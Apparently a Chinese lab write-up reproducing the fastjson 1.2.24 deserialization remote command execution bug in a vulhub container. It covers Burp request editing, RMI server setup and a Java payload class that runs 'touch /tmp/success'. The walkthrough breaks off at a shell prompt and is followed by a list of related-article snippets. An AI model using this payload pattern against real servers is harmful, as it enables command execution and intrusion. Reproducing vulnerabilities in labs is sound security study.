fastjson 1.2.24 反序列化导致任意命令执行漏洞

环境搭建vulhub一键启动

https://vulhub.org/#/environments/fastjson/1.2.24-rce/

docker-compose up -d

访问本地ip的8090端口

1.bp抓包发现对象转换成json格式数据

2.更换数据测试

右键 change request method 改成post发包,类型改为json

3.建立rmi服务器

保存java恶意代码如下,(执行 touch /tmp/success)

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"touch", "/tmp/success"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

编译代码,注意此环境需要jdk1.8环境编译,kail默认是11.0版本,需要安装jdk1.8(略),并且选择使用jdk1.8

┌──(root												

fastjson 1.2.24 反序列化导致任意命令执行漏洞相关推荐

  1. fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)

    漏洞背景 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处理引擎.Fastjson是其中的一个基于Java的JSON解析器/生成器. Pippo 1.11. ...

  2. fastjson 1.2.24 反序列化导致任意命令执行漏洞复现

    前言 fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象. fastjson在解析js ...

  3. FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)

    #FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...

  4. fastjsonfastjson 1.2.24 反序列化导致任意命令执行

    一 漏洞描述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性.通过查找代码中相关的方法,即可构造出一些恶意利用链. 受 ...

  5. python直接执行代码漏洞_修复Python任意命令执行漏洞

    Author:JoyChou@美丽联合安全 Date:20180605 1. 前言 今天遇到一个不好做白名单的Python命令执行漏洞修复的问题.由于是shell=True导致的任意命令执行,一开始大 ...

  6. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  7. 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...

  8. couchdb 任意命令执行漏洞(cve-2017-12636)

    Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...

  9. eyoucms 1.5.5任意命令执行漏洞(0day)

    eyoucms 1.5.5任意命令执行漏洞 文章目录 eyoucms 1.5.5任意命令执行漏洞 一.漏洞简介 二.漏洞影响 三.复现过程 漏洞位置 漏洞分析 漏洞利用 一.漏洞简介 eyoucms1 ...

  10. wordpress 4.6任意命令执行漏洞(PwnScriptum)复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...

最新文章

  1. 这几道Redis面试题都不懂,怎么拿offer?
  2. 读取csv数据存到list,批量写入mysql
  3. 安装配置Statspack
  4. 迷宫求解无敌版(递归调用法)
  5. java_basic_review(5) java继承
  6. Java 9代码工具:使用Java微型基准测试工具的实践会话
  7. Spark-on-YARN
  8. micropython gpio_micropython GPIO
  9. 客流分析江湖争端再起,新旧势力谁更胜一筹?
  10. HTML5+CSS3项目实战之河马牙医首页、百度首页、Mac桌面、简书首页、登录注册页面、苏宁易购首页
  11. Java实时获取基金收益项目源码分享
  12. win7 把html作为桌面,微软开始部署桌面HTML5版必应Bing
  13. 基础(四)之java后端根据经纬度获取地址
  14. 遥感—以常用夜光遥感卫星介绍为主
  15. 80386读书笔记之保护虚拟地址存储方式(二)
  16. Ardunio开发实例-BMP183温度传感器
  17. html中怎样变单独英文月份,(整理)如何单独表示英文月份
  18. FOC之PLL锁相环
  19. 动态设置video的宽高的方法,js设置和CSS设置
  20. 差分曼彻斯特第一位判断方法

热门文章

  1. 使用RedRocket方便的查看证券数据
  2. Less使用语法(详细)
  3. vs编译log4cpp代码,函数“int snprintf(char *const,const std::size_t,const char *const,...)”已有主体
  4. 使用给定的整数n,编写一个程序生成一个包含(i, i*i)的字典,该字典包含1到n之间的整数(两者都包含)。假设向程序输入:5则输出为:{1:1, 2:4, 3:9, 4:16, 5:25}
  5. wamp 升php7,wamp升级php7
  6. 小米路由器mini刷linux,xiaomi mini路由器安装breed和openwrt固件
  7. 设置路由器虚拟服务器拦截广告,路由器怎么安装防火墙?拦截病毒广告就这么简...
  8. 服务器上使用nvcc编译多个cu文件,在cmake中使用nvcc编译。cu
  9. Java个人职业发展方向
  10. SpringIOC控制反转之XML配置